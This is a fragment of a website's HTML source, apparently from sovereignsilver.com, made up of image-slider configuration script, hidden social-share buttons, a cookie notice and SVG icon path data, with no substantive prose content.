tpj.noConflict();} if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"standard", jsFileLocation:"//sovereignsilver.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { keyboardNavigation:"off", keyboard_direction: "horizontal", mouseScrollNavigation:"off", mouseScrollReverse:"default", onHoverStop:"off", touch:{ touchenabled:"on", touchOnDesktop:"off", swipe_threshold: 75, swipe_min_touches: 1, swipe_direction: "horizontal", drag_block_vertical: false } , bullets: { enable:true, hide_onmobile:false, style:"hermes", hide_onleave:false, direction:"horizontal", h_align:"center", v_align:"bottom", h_offset:0, v_offset:10, space:5, tmp:'' } }, responsiveLevels:[1240,1024,778,480], visibilityLevels:[1240,1024,778,480], gridwidth:[1240,1024,778,400], gridheight:[576,576,425,240], lazyType:"all", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */</script> <div class="swp-hidden-panel-wrap" style="display: none; visibility: collapse; opacity: 0"><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_other_full_color swp_individual_full_color scale-100 scale-full_width" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_google_plus" data-network="google_plus"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://plus.google.com/share?url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_google_plus_icon"></i><span class="swp_share">+1</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Share</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=Home&url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://twitter.com/intent/tweet?text=Home&url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tweet</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Share</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_pinterest" data-network="pinterest"><a rel="nofollow noreferrer noopener" class="nc_tweet swp_share_link noPop" onClick="var e=document.createElement('script'); e.setAttribute('type','text/javascript'); e.setAttribute('charset','UTF-8'); e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999); document.body.appendChild(e); " ><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_pinterest_icon"></i><span class="swp_share">Pin</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_email" data-network="email"><a class="nc_tweet noPop swp_share_link" rel="nofollow noreferrer noopener" href="mailto:?subject=Home&body=%0D%0A%0D%0ARead More Here: %20https%3A%2F%2Fsovereignsilver.com%2F" target="_blank"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_email_icon"></i><span class="swp_share">Email</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button total_shares total_sharesalt" ><span class="swp_count ">5K <span class="swp_label">Shares</span></span></div></div></div><script type="text/javascript">var swp_nonce = "55e3130607";var swpFloatBeforeContent = false;var swpClickTracking = false; swpPinIt={"enabled":false};</script> <div id="cookie-notice" role="banner" class="cn-bottom wp-default" style="color: #fff; background-color: #8e8e8e;"><div class="cookie-notice-container"><span id="cn-notice-text">Our site uses cookies and other tracking technologies to assist with navigation and your ability to provide feedback, analyse your use of our products and services, assist with our promotional and marketing efforts.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button wp-default testim-btn">Ok</a><a href="https://sovereignsilver.com/privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button wp-default testim-btn">Privacy policy</a></div></div><svg xmlns="http://www.w3.org/2000/svg" style="position:absolute;width:0;height:0" overflow="hidden"><defs><symbol viewBox="0 0 37 32"><path d="M33 6.05h-9.13v2.22H33V6.05zm-4.5 7.6q-1.6 0-2.6.95t-1.1 2.54h7.27q-.32-3.48-3.57-3.48zm.3 10.46q1.1 0 2.17-.56t1.35-1.56h3.95q-1.8 5.48-7.63 5.48-3.82 0-6.08-2.35t-2.26-6.2q0-3.7 2.33-6.16t6-2.45q2.48 0 4.3 1.2t2.74 3.2.9 4.43q0 .3-.03.83H24.8q0 2 1 3.07t3 1.08zm-23.85-.9h5.28q3.66 0 3.66-2.97 0-3.2-3.56-3.2h-5.4v6.18zm0-9.57h5q1.4 0 2.22-.66t.8-2.02q0-2.57-3.38-2.57H4.94v5.25zM0 4.53h10.6q1.56 0 2.77.26t2.26.83 1.6 1.73.57 2.75q0 3.24-3.07 4.7 2.04.57 3.07 2.06t1.04 3.64q0 1.34-.44 2.44t-1.18 1.85-1.76 1.25-2.16.75-2.4.24H0V4.54z" class="path1"/></symbol><symbol viewBox="0 0 18 32"><path d="M18.3 5.4l-5.42 10.4.42.56h5v7.4H9.22l-.78.54-2.54 4.88-.53.54H0v-5.4l5.4-10.43-.42-.54H0v-7.4h9.05l.8-.55L12.37.55 12.9 0h5.4v5.4z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M10.66 7.52v20.94q0 .45-.22.76t-.65.32q-.32 0-.6-.15L.9 25.22q-.38-.18-.64-.6T0 23.8V3.45q0-.36.18-.6t.52-.26q.25 0 .78.26l9.13 4.57q.06.05.06.1zm1.14 1.8l9.54 15.46-9.54-4.75V9.34zm20.2.32v18.82q0 .45-.25.73t-.68.26-.84-.23l-7.87-3.93zm-.05-2.14q0 .05-4.58 7.5T22 23.7l-6.96-11.33 5.78-9.4q.3-.5.93-.5.25 0 .46.1L31.9 7.4q.07.03.07.1z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M15.6 13.2q0 1.5-1.14 2.56t-2.73 1.06T9 15.76 7.9 13.2q0-1.5 1.13-2.54t2.73-1.05 2.72 1.06 1.14 2.55zm8.95 0q0 1.5-1.12 2.56t-2.73 1.06q-1.6 0-2.73-1.06t-1.13-2.55q0-1.5 1.13-2.54T20.7 9.6q1.6 0 2.73 1.06t1.12 2.55zm4.02 3.23V4.53q0-1.57-.57-2.22t-1.98-.64H6.16q-1.48 0-2 .6t-.53 2.26v12.02q.76.4 1.58.7t1.45.5 1.45.34 1.27.2 1.25.07 1.04 0 1-.03.8-.04q1.22 0 1.7.5.1.1.18.15.46.44 1.1.9.1-1.62 2.1-1.55.08 0 .65.03t.76.05.8.02.95-.02 1-.08 1.08-.15 1.1-.25 1.2-.34 1.2-.5 1.3-.6zm2.9-.1q-2.15 2.67-6.63 4.5 1.5 5.1-.4 8.3-1.2 2.03-3.28 2.66-1.86.56-3.25-.28-1.53-.9-1.45-2.93l-.02-5.83v-.02q-.15-.04-.44-.1t-.43-.1l-.02 6.04q.07 2.03-1.48 2.92-1.4.84-3.27.27-2.1-.66-3.25-2.7-1.87-3.2-.4-8.26Q2.7 19 .53 16.34q-.45-.66-.08-1.12t1.08 0q.05.05.2.14t.2.14V3.1q0-1.28.83-2.2T4.78 0h22.45q1.2 0 2.03.9t.84 2.2v12.4l.38-.27q.7-.48 1.07 0t-.07 1.1z" class="path1"/></symbol><symbol viewBox="0 0 30 32"><path d="M15.14 2.3q2.4-.03 4.3 1.2t2.92 3.45q.48 1.03.48 3.2 0 .83-.16 3.4.25.13.5.13.32 0 .9-.24t.92-.24q.52 0 1 .32t.48.82q0 .57-.56.96t-1.23.57-1.24.5-.57.86q0 .27.2.77.67 1.46 1.84 2.68t2.58 1.8q.5.22 1.43.4.5.12.5.64 0 1.25-3.9 1.84-.14.2-.2.7t-.26.82-.6.33q-.36 0-1.1-.1t-1.15-.12q-.66 0-1.1.1-.58.08-1.13.4t-1.04.67-1.03.72-1.36.6-1.78.24q-.93 0-1.72-.23t-1.34-.6-1.03-.72-1.03-.68-1.1-.4q-.48-.1-1.14-.1-.43 0-1.17.15t-1.05.13q-.45 0-.63-.33t-.25-.85-.2-.7q-3.9-.6-3.9-1.85 0-.52.5-.63.93-.2 1.43-.42 1.4-.57 2.58-1.8T6.6 18q.22-.5.22-.77 0-.5-.56-.85t-1.24-.52-1.24-.57-.57-.94q0-.5.48-.82t.98-.33q.27 0 .85.25t.96.23q.32 0 .57-.13-.16-2.53-.16-3.4 0-2.17.48-3.2Q8.5 4.5 10.42 3.4t4.72-1.12z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M13.8 23.55v2.27q0 5.22-.1 5.45-.22.57-.9.7-.98.17-3.25-.67t-2.9-1.6q-.24-.25-.3-.63-.03-.2.06-.46.08-.17.62-.83t3.23-3.86q.02 0 1.07-1.24.27-.34.7-.44t.9.07q.42.17.66.5t.22.75zm-2.66-4.48q-.05.98-.93 1.25l-2.13.7q-4.9 1.57-5.2 1.57-.64-.05-.98-.65-.22-.45-.3-1.34-.15-1.35 0-2.97t.54-2.22 1-.56q.24 0 3.6 1.37 1.26.53 2.06.85l1.5.6q.42.17.64.56t.2.87zm14.75 5.3q-.13.97-1.64 2.88t-2.42 2.27q-.66.25-1.13-.13-.24-.2-3.27-5.13l-.84-1.38q-.26-.38-.22-.83t.35-.82q.63-.77 1.48-.46.03 0 2.14.7 3.62 1.18 4.32 1.42t.84.37q.5.38.4 1.08zm-12-11.28q.08 1.8-.97 2.17-1.04.3-2.04-1.27L4.13 3.32q-.14-.62.34-1.1.73-.77 3.7-1.6T12.2.05q.7.18.87.8.06.33.4 5.46t.42 6.8zM25.7 15q.07.7-.45 1.05-.27.18-5.88 1.54-1.2.28-1.62.42l.02-.04q-.4.1-.82-.07t-.66-.56q-.55-.84 0-1.55 0-.03 1.32-1.83 2.24-3.06 2.68-3.65t.6-.7q.5-.33 1.17-.03.86.4 2.2 2.37t1.44 3v.05z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M26.73 14.77v3.53q-1.8.42-3.53.42-1.17 2.42-2.96 4.83T17 27.4t-2.3 1.9q-1.4.8-2.88-.05-.5-.3-1.08-.78t-1.52-1.5T7.4 24.7t-1.93-3.3-1.88-4.36-1.64-5.6T.7 4.45h5.05Q6.2 8.36 7 11.58t1.87 5.66 2.17 4.2 2.5 3.5q3-3.03 5.12-7.26-2.53-1.3-3.98-3.93T13.23 7.8q0-3.43 1.86-5.6T20.15 0q3.18 0 4.88 1.88t1.7 5.32q0 2.84-1.04 5.1-.13.02-.35.06t-.82.03-1.13-.1-1.1-.47-.9-.92q.55-1.83.55-3.27 0-1.56-.52-2.36t-1.4-.8q-.96 0-1.53.88t-.57 2.5q0 3.33 1.87 5.25t4.77 1.92q1.1 0 2.16-.25z" class="path1"/></symbol><symbol viewBox="0 0 35 32"><path d="M34.23 9.3q.4 1.13-2.68 5.24-.43.57-1.16 1.5-1.4 1.8-1.6 2.35-.32.72.23 1.44.3.37 1.45 1.46h.02l.07.07q2.52 2.34 3.4 3.95.07.1.13.22t.12.48 0 .6-.45.5-1.06.22l-4.56.07q-.43.1-1-.08t-.93-.4l-.34-.2q-.54-.38-1.25-1.15t-1.22-1.4-1.1-1.02-1-.28q-.05.02-.14.06t-.3.26-.4.52-.3.93-.1 1.38q0 .27-.07.5t-.13.32l-.07.1q-.32.33-.95.4h-2.05q-1.27.06-2.6-.3t-2.36-.95-1.83-1.18T8.7 23.9l-.43-.44q-.18-.18-.5-.54T6.5 21.3t-1.9-2.7-2.18-3.76T.1 9.98q-.12-.3-.12-.48t.06-.3l.07-.1q.27-.34 1.02-.34l4.9-.03q.2.03.4.1t.3.17l.08.05q.3.2.43.57.36.9.82 1.85t.74 1.45l.27.52q.52 1.07 1 1.86t.87 1.22.74.7.6.24.5-.1q.02 0 .08-.08t.2-.4.25-.83.18-1.45 0-2.23q-.03-.7-.16-1.3t-.25-.82l-.1-.22q-.45-.6-1.52-.76-.24-.04.08-.43.3-.34.68-.54.96-.46 4.28-.43 1.47.02 2.4.23.37.1.6.24t.38.43.18.57.07.82 0 .98-.06 1.26-.02 1.47q0 .2-.02.75t0 .86.05.72.2.7.4.44q.15.03.3.07t.48-.2.68-.6.94-1.2 1.2-1.92q1.08-1.86 1.92-4.02.07-.18.18-.3t.2-.2l.07-.05.1-.04t.23-.05.35 0l5.15-.04q.7-.1 1.14.05t.55.3z" class="path1"/></symbol><symbol viewBox="0 0 30 32"><path d="M20.57 14.86q0-3.3-2.35-5.66t-5.65-2.34T6.92 9.2t-2.35 5.66 2.35 5.65 5.65 2.36 5.65-2.35 2.35-5.64zM29.7 29.7q0 .94-.67 1.62t-1.6.68q-.97 0-1.6-.68l-6.13-6.1q-3.2 2.2-7.13 2.2-2.55 0-4.88-.98t-4.03-2.68T1 19.74t-1-4.88 1-4.9 2.67-4 4.02-2.7 4.87-.98 4.9 1 4 2.67 2.68 4.02 1 4.9q0 3.9-2.22 7.1l6.12 6.14q.67.67.67 1.6z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M29.7 26.86V13.14q-.56.65-1.22 1.18-4.78 3.68-7.6 6.04-.92.77-1.5 1.2t-1.53.86-1.83.44h-.04q-.85 0-1.83-.44t-1.54-.87-1.47-1.2Q8.3 18 3.53 14.33q-.67-.53-1.24-1.18v13.72q0 .23.16.4t.4.17h26.28q.24 0 .4-.17t.18-.4zm0-18.77v-.45t0-.23-.05-.22-.1-.17-.16-.13-.26-.04H2.86q-.24 0-.4.17t-.18.4q0 3 2.63 5.07 3.45 2.7 7.17 5.66.1.1.62.53t.82.66.8.56.9.5.76.15h.04q.35 0 .76-.16t.9-.48.8-.56.82-.67.63-.54q3.7-2.95 7.16-5.66.95-.77 1.78-2.06t.83-2.35zm2.3-.67v19.43q0 1.18-.84 2.02t-2.02.83H2.86q-1.18 0-2.02-.82T0 26.86V7.43Q0 6.25.84 5.4t2.02-.83h26.28q1.18 0 2.02.84T32 7.44z" class="path1"/></symbol><symbol viewBox="0 0 25 32"><path d="M23.18 23.6q0 .72-.5 1.22l-2.43 2.43q-.5.5-1.2.5t-1.23-.5L12.57 22l-5.25 5.25q-.5.5-1.2.5t-1.23-.5l-2.43-2.43q-.5-.5-.5-1.2t.5-1.23l5.25-5.26-5.25-5.25q-.5-.5-.5-1.22t.5-1.2L4.9 7.03q.5-.5 1.2-.5t1.22.5l5.25 5.25 5.25-5.26q.5-.5 1.22-.5t1.2.5l2.44 2.42q.5.5.5 1.22t-.5 1.2l-5.25 5.26 5.25 5.25q.5.5.5 1.2z" class="path1"/></symbol><symbol viewBox="0 0 21 32"><path d="M19.2 13.14q0 .24-.18.4L10.7 21.9q-.18.17-.4.17t-.43-.18l-8.32-8.32q-.18-.18-.18-.4t.18-.42l.9-.9q.18-.17.4-.17t.42.18l7.02 7.02 7-7.02q.18-.18.42-.18t.4.18l.9.9q.18.17.18.4z" class="path1"/></symbol><symbol viewBox="0 0 34 32"><path d="M33.55 17q0 .55-.55 1.18l-6 7.07q-.77.9-2.15 1.54t-2.57.63H2.86q-.6 0-1.08-.23t-.48-.77q0-.55.56-1.18l6-7.07q.77-.9 2.15-1.55t2.57-.63H32q.6 0 1.08.23t.47.77zm-6.12-6.14v2.85H12.57q-1.68 0-3.52.86T6.12 16.7l-6.1 7.17q0-.07 0-.22T0 23.43V6.3q0-1.66 1.18-2.83T4 2.3h5.7q1.66 0 2.83 1.17T13.7 6.3v.56h9.73q1.64 0 2.82 1.18t1.18 2.82z" class="path1"/></symbol><symbol viewBox="0 0 30 32"><path d="M28.93 7.3q-1.2 1.74-2.9 2.97.02.25.02.75 0 2.32-.68 4.63t-2.06 4.44-3.28 3.75-4.6 2.6-5.78.98q-4.84 0-8.85-2.6.6.08 1.38.08 4.02 0 7.16-2.45-1.88-.04-3.36-1.16t-2.03-2.85q.6.1 1.1.1.75 0 1.5-.2-2-.42-3.3-2t-1.32-3.67v-.07q1.2.7 2.6.74-1.17-.8-1.87-2.05t-.7-2.76q0-1.58.8-2.92Q4.9 8.3 8 9.88t6.64 1.78q-.14-.68-.14-1.32 0-2.4 1.7-4.08t4.07-1.7q2.5 0 4.2 1.83Q26.44 6 28.15 5q-.66 2.05-2.53 3.18 1.67-.18 3.33-.9z" class="path1"/></symbol><symbol viewBox="0 0 19 32"><path d="M17.13.2v4.73h-2.8q-1.55 0-2.08.64T11.7 7.5v3.38h5.25l-.7 5.28H11.7v13.56H6.26V16.16H1.7v-5.28h4.55v-3.9q0-3.32 1.86-5.15T13.06 0q2.63 0 4.07.2z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M13.7 2.3q3.75 0 6.9 1.83t5 5T27.42 16q0 4.48-2.62 8.06t-6.75 4.96q-.48.1-.7-.13t-.24-.54q0-.06.02-1.37t0-2.4q0-1.74-.92-2.55 1-.1 1.83-.32t1.68-.7 1.45-1.18.95-1.88.36-2.7q0-2.1-1.4-3.66.65-1.62-.15-3.64-.5-.16-1.44.2t-1.64.78l-.68.43q-1.66-.46-3.43-.46t-3.42.47q-.28-.2-.76-.48t-1.5-.7-1.5-.24q-.8 2.02-.15 3.65-1.4 1.56-1.4 3.68 0 1.52.36 2.68t.94 1.88 1.43 1.2 1.68.7 1.83.3q-.68.66-.86 1.85-.38.17-.8.26t-1.02.1-1.17-.4-1-1.1q-.33-.58-.86-.94t-.9-.43l-.35-.06q-.38 0-.52.08t-.1.2.17.25.23.2l.13.1q.4.18.78.68t.56.9l.18.42q.23.68.78 1.1t1.2.54 1.24.13 1-.06l.4-.07q0 .68 0 1.58t.02.97q0 .32-.23.54t-.73.1q-4.14-1.36-6.75-4.94T0 16q0-3.74 1.84-6.9t5-4.98 6.87-1.84zM5.2 21.97q.05-.12-.13-.2-.18-.07-.23.02-.06.13.12.22.16.1.24-.04zm.55.6q.13-.08-.04-.28-.16-.16-.27-.05-.13.1.03.28.18.18.3.06zm.54.8q.15-.1 0-.33-.16-.23-.32-.1-.16.1 0 .32t.3.12zm.74.76q.14-.14-.08-.34-.2-.2-.35-.05-.15.14.08.34.2.2.36.04zm1 .45q.07-.2-.22-.3-.27-.07-.34.13t.23.27q.28.1.35-.1zm1.14.08q0-.23-.3-.2-.3 0-.3.2 0 .23.3.2.3 0 .3-.2zm1.03-.18q-.02-.2-.3-.16-.3.05-.26.27t.32.15.25-.25z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M27.43 24v2.3q0 .45-.34.8t-.8.33H1.13q-.46 0-.8-.34T0 26.3V24q0-.46.34-.8t.8-.34H26.3q.45 0 .8.34t.33.8zm0-9.14v2.28q0 .47-.34.8t-.8.35H1.13q-.46 0-.8-.35t-.34-.8v-2.3q0-.46.34-.8t.8-.34H26.3q.45 0 .8.35t.33.8zm0-9.15V8q0 .46-.34.8t-.8.34H1.13q-.46 0-.8-.34T0 8V5.7q0-.45.34-.8t.8-.33H26.3q.45 0 .8.34t.33.8z" class="path1"/></symbol><symbol viewBox="0 0 41 32"><path d="M25.66 16.3q0 3.72-1.55 6.62t-4.42 4.54-6.6 1.63q-2.65 0-5.08-1.05t-4.18-2.78-2.78-4.18T0 16t1.04-5.1 2.78-4.17T8 3.95t5.1-1.04q5.1 0 8.76 3.44l-3.56 3.4q-2.1-2-5.2-2-2.2 0-4.07 1.1t-2.96 3T4.97 16t1.1 4.15 2.96 3 4.06 1.12q1.47 0 2.7-.4t2.06-1.04 1.4-1.4.87-1.48.4-1.33h-7.44v-4.5h12.35q.2 1.13.2 2.18zm15.48-2.18v3.76H37.4v3.73h-3.74v-3.73h-3.73v-3.75h3.73V10.4h3.75v3.73h3.74z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M6.23 11.16v17.7H.33v-17.7h5.9zM6.6 5.7q.03 1.3-.9 2.17t-2.42.88h-.03Q1.8 8.75.9 7.87T0 5.7q0-1.33.92-2.2t2.4-.86 2.38.87.9 2.2zm20.83 13v10.16h-5.88V19.4q0-1.88-.72-2.94t-2.26-1.07q-1.12 0-1.88.6t-1.15 1.54q-.2.53-.2 1.44v9.88H9.5q.04-7.13.04-11.56t-.02-5.28l-.02-.86h5.88v2.57h-.04q.36-.57.73-1t1-.93 1.57-.78 2.04-.27q3.06 0 4.9 2.02t1.87 5.94z" class="path1"/></symbol><symbol viewBox="0 0 30 32"><path d="M13.7 5.7v12.6q0 1.84-.7 3.53t-1.96 2.92-2.92 1.96-3.55.73H3.43q-.47 0-.8-.34t-.35-.82V24q0-.47.34-.8t.8-.34h1.15q1.9 0 3.23-1.34t1.34-3.23v-.6q0-.7-.5-1.2t-1.2-.5h-4Q2 16 1 15t-1-2.43V5.7q0-1.4 1-2.4t2.43-1h6.85q1.43 0 2.43 1t1 2.4zm16 0v12.6q0 1.84-.7 3.53t-1.96 2.92-2.92 1.96-3.55.73h-1.14q-.47 0-.8-.34t-.35-.82V24q0-.47.34-.8t.8-.34h1.15q1.9 0 3.23-1.34t1.34-3.23v-.6q0-.7-.5-1.2t-1.2-.5h-4Q18 16 17 15t-1-2.43V5.7q0-1.4 1-2.4t2.43-1h6.85q1.43 0 2.43 1t1 2.4z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M32 20q0 2.96-2.27 8.05-.05.13-.2.43t-.23.54-.23.4q-.2.3-.5.3-.27 0-.42-.18T28 29.1q0-.17.04-.48t.05-.42q.08-1.22.08-2.2 0-1.8-.3-3.23T27 20.3t-1.43-1.8-1.88-1.25-2.4-.76-2.74-.4-3.13-.1h-4v4.57q0 .47-.34.8t-.82.35-.8-.34L.34 12.23Q0 11.9 0 11.43t.34-.8l9.14-9.15q.34-.34.8-.34t.8.34.35.8v4.58h4q12.73 0 15.62 7.2.95 2.4.95 5.94z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M17.34 22.2V26q0 1.2-.7 1.2-.4 0-.8-.4v-5.37q.4-.38.8-.38.7 0 .7 1.2zm6.04.03v.82h-1.6v-.82q0-1.2.8-1.2t.8 1.2zm-17.25-3.9h1.9v-1.67H2.48v1.68h1.87V28.5h1.8V18.34zm5.14 10.17h1.6v-8.82h-1.6v6.75q-.54.75-1.02.75-.32 0-.38-.38 0-.05 0-.62v-6.5h-1.6v6.98q0 .88.14 1.3.22.67 1.05.67.85 0 1.82-1.1v.97zm7.66-2.64v-3.52q0-1.3-.16-1.77-.3-1-1.27-1-.9 0-1.66.96v-3.87h-1.6V28.5h1.6v-.86q.8.98 1.66.98.96 0 1.27-.98.16-.48.16-1.78zm6.03-.18v-.23h-1.62q0 .9-.04 1.1-.12.63-.7.63-.83 0-.83-1.23V24.4h3.2v-1.85q0-1.4-.5-2.07-.68-.9-1.88-.9-1.23 0-1.92.9-.5.66-.5 2.07v3.1q0 1.4.52 2.06.7.93 1.92.93 1.3 0 1.93-.95.32-.48.38-.96.03-.17.03-1.04zM14.1 9.38V5.62q0-1.23-.76-1.23t-.77 1.22v3.75q0 1.26.77 1.26t.77-1.26zm12.85 13.4q0 4.2-.47 6.26-.25 1.05-1.03 1.76t-1.82.83q-3.3.37-9.92.37t-9.9-.38q-1.03-.1-1.83-.82T.95 29.04q-.47-2-.47-6.25 0-4.2.47-6.26.25-1.06 1.03-1.77t1.84-.84q3.27-.36 9.9-.36t9.9.36q1.04.12 1.83.84t1.03 1.77q.47 2 .47 6.25zM9.13 0h1.82L8.8 7.13v4.83H7V7.12Q6.75 5.8 5.9 3.35 5.26 1.5 4.76 0h1.9L7.9 4.7zm6.6 5.95v3.12q0 1.45-.5 2.1-.66.92-1.9.92-1.2 0-1.87-.92-.5-.68-.5-2.1V5.94q0-1.43.5-2.1.68-.9 1.88-.9 1.23 0 1.9.9.5.67.5 2.1zm5.98-2.9v8.9h-1.6V11q-.96 1.1-1.85 1.1-.82 0-1.05-.65-.15-.43-.15-1.34V3.04h1.63V9.6q0 .6.02.63.05.4.37.4.48 0 1.02-.77v-6.8h1.6z" class="path1"/></symbol><symbol viewBox="0 0 32 32"><path d="M7.18 12.63L16 18.07l-6.1 5.1-8.76-5.7zm17.6 9.9v1.94l-8.74 5.23H16l-8.73-5.24v-1.92l2.62 1.7L16 19.2v-.04l.02.02.02-.02v.04l6.12 5.07zM9.9 2.12L16 7.2l-8.82 5.42L1.14 7.8zm14.94 10.53l6.04 4.83-8.73 5.7-6.13-5.1zM22.12 2.1l8.74 5.7-6.04 4.82L16 7.2z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M18.3 16q0-1.9-1.35-3.23t-3.23-1.34-3.24 1.34T9.14 16t1.34 3.23 3.24 1.34 3.23-1.34T18.3 16zm2.45 0q0 2.93-2.05 4.98t-5 2.06-4.97-2.06T6.68 16t2.05-4.98 4.98-2.06 5 2.06T20.75 16zm1.93-7.32q0 .68-.48 1.16t-1.16.48-1.17-.48-.48-1.16.47-1.16 1.17-.48 1.16.48.48 1.16zM13.7 4.75q-.1 0-1.35 0t-1.9 0-1.7.04-1.85.17-1.28.33q-.9.36-1.57 1.04T3.02 7.9q-.2.53-.33 1.3t-.2 1.83-.05 1.72 0 1.88 0 1.37 0 1.37 0 1.88.06 1.72.2 1.84.32 1.3q.35.88 1.03 1.56t1.57 1.04q.52.2 1.28.33t1.84.17 1.72.06 1.9 0 1.35 0 1.38 0 1.88 0 1.73-.06 1.83-.17 1.27-.33q.9-.36 1.57-1.04t1.04-1.57q.2-.53.34-1.3t.18-1.83.05-1.72 0-1.88 0-1.37 0-1.37 0-1.88-.05-1.72-.18-1.84-.33-1.3q-.35-.88-1.03-1.56T21.8 5.3q-.52-.2-1.27-.33T18.7 4.8t-1.74-.06-1.88 0-1.37 0zM27.44 16q0 4.1-.1 5.66-.17 3.72-2.2 5.75t-5.75 2.23q-1.57.08-5.66.08t-5.67-.08q-3.7-.17-5.75-2.2T.1 21.65Q0 20.1 0 16t.1-5.66q.17-3.7 2.2-5.75t5.75-2.22q1.58-.1 5.67-.1t5.66.1q3.7.17 5.75 2.2t2.2 5.76q.1 1.57.1 5.66z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M22.3 2.3q2.1 0 3.62 1.5t1.5 3.63v17.14q0 2.13-1.5 3.64t-3.63 1.52H5.13q-2.12 0-3.63-1.5T0 24.56V7.43Q0 5.3 1.5 3.8t3.64-1.5H22.3zM12.45 16q0-1.57-1.1-2.68t-2.68-1.1T6 13.3 4.9 16 6 18.68t2.68 1.1 2.68-1.1 1.1-2.68zm10.08 0q0-1.57-1.1-2.68t-2.7-1.1-2.67 1.1-1.1 2.68 1.1 2.68 2.68 1.1 2.68-1.1 1.1-2.68z" class="path1"/></symbol><symbol viewBox="0 0 19 32"><path d="M16.86 23.73l1.43 4.23q-.43.63-2 1.18t-3.16.57q-1.85.05-3.4-.45T7.2 27.93t-1.7-1.9-1-2.14-.3-2.1v-9.73h-3V8.23Q2.5 7.77 3.53 7t1.62-1.62 1.04-1.82.6-1.76.27-1.58q.02-.1.08-.16T7.27 0h4.36v7.57h5.94v4.5H11.6v9.25q0 .54.12 1t.4.94.9.74 1.44.25q1.4-.04 2.4-.52z" class="path1"/></symbol><symbol viewBox="0 0 27 32"><path d="M18.3 26.8q-.76-4.32-2.5-8.9h-.09q-.27.12-.75.3t-1.8.88-2.45 1.47-2.34 2.04-1.84 2.63l-.27-.2q3.3 2.7 7.46 2.7 2.37 0 4.6-.94zm-3.32-10.85q-.37-.88-.94-2-5.56 1.68-12.02 1.68Q2 15.74 2 16q0 2.2.8 4.22t2.2 3.6q.9-1.6 2.2-2.97t2.55-2.23 2.33-1.44 1.78-.86l.66-.23q.07-.03.23-.07t.23-.08zm-1.9-3.8q-2.15-3.8-4.37-6.74-2.45 1.17-4.17 3.33T2.25 13.6q5.4 0 10.82-1.44zm12.2 5.7q-3.74-1.06-7.3-.5 1.56 4.26 2.3 8.36 1.97-1.33 3.3-3.37t1.7-4.47zM10.92 4.63q0 0-.03.02.02 0 .04 0zm10.55 2.6q-3.3-2.93-7.74-2.93-1.34 0-2.75.32 2.34 3.04 4.4 6.83 1.22-.47 2.3-1.08t1.73-1.1 1.17-1.02.67-.72zm3.98 8.66q-.06-4.15-2.66-7.33l-.02.02q-.16.22-.34.44t-.77.8-1.26 1.1-1.8 1.15-2.34 1.15q.45.94.8 1.7.02.1.1.3t.14.3q.64-.1 1.33-.12t1.3-.04 1.24.03 